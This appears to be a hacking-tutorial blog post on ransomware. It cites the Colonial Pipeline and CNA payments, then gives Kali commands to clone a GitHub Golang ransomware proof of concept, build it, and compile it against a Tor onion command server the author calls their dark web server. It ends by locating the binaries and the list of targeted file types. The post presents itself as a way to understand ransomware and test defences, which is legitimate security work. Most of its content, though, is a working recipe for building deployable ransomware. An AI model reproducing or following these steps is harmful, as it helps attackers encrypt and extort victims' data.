Welcome back, my aspiring cyberwarriors!
Ransomware is rapidly becoming the most important form of malware afflicting our digital systems. Companies across the globe are being hit with various forms of malware including the new variant, Snake, designed specifically for SCADA/ICS systems. The Colonial Pipeline in the US was shutdown for nearly a week before paying a $5 million ransom, demonstrating the danger of this ransomware to industrial systems and a nation's infrastructure. Recently, the major US insurance company, CNA, admitted to having paid a ransom of $40 million! No wonder ransomware developers are getting more and more creative and malicious, ransomware pays!
To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on github.com. He developed this ransomware as part of his academic program and it is not designed for malicious purposes but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, this malware is written in Golang.
This malware encrypts the files in the background with AES-256-CTR and uses RSA-4096 to secure the data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.
Step #1: Download and Install the Binaries
The first step is to fire up your Kali and make certain that golang is installed. If not, download it from the Kali repositories by entering;
kali > sudo apt install golang
Next, you will need to login to the root user.
kali > sudo su -
Now create a directory for the binaries. In this case, I named it simply "git".
kali >mkdir git
Next, change directory (cd) to this directory.
kali > cd git
Next, download the binaries from github.com.
kali > git clone https://github.com/mauri870/ransomware
Step #2: Export GO Environment variables
Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories.
Step #3: Make the source code dependencies
Now, with the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps.
kali > cd ransomware
kali > make deps
Step #4: Make the Source Code with options
Now that we have completed the deps make, we can begin to make the source code. In our case, we will use a few options.
First, we want to use ToR to encrypt our communications over the ToR network.
Second, we want to use our dark web server at hackersarisegtdj.onion (you can use any domain or localhost).
Third, we want to use port 80 (you can use any port).
Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux.
Our command should look something like this;
kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux
Now hit ENTER and watch your ransomware compile.
Step #5: Check the Directory for ransomware.exe
Once the source code has been generated, do a long listing on the ransomware directory.
kali > ls -l
Now, navigate to the bin directory.
kali > cd bin
Here, you will see the ransomware.exe, the server and unlocker.exe.
Step #6: Examine the Types of Files to be Encrypted
If you want to see what types of files this ransomware will encrypt, navigate to cmd directory and open common.go
kali > cd cmd
kali > more common.go
Here, you can see the file extensions that this ransomware will target to encrypt when executed.
Ransomware is probably the greatest threat to our digital systems at this moment. As the Colonial Pipeline attack clearly demonstrated, nearly everyone is vulnerable and if SCADA/ICS systems are compromised there can be significant economic and infrastructure ramifications!
This POC of ransomware will help you to better understand ransomware as a threat and test to see whether your systems are vulnerable to such an attack.
In the second part of this series, we will test this ransomware on a Windows VM.
If you want or your team to learn more about ransomware, our Ransomware training videos are available in our online store.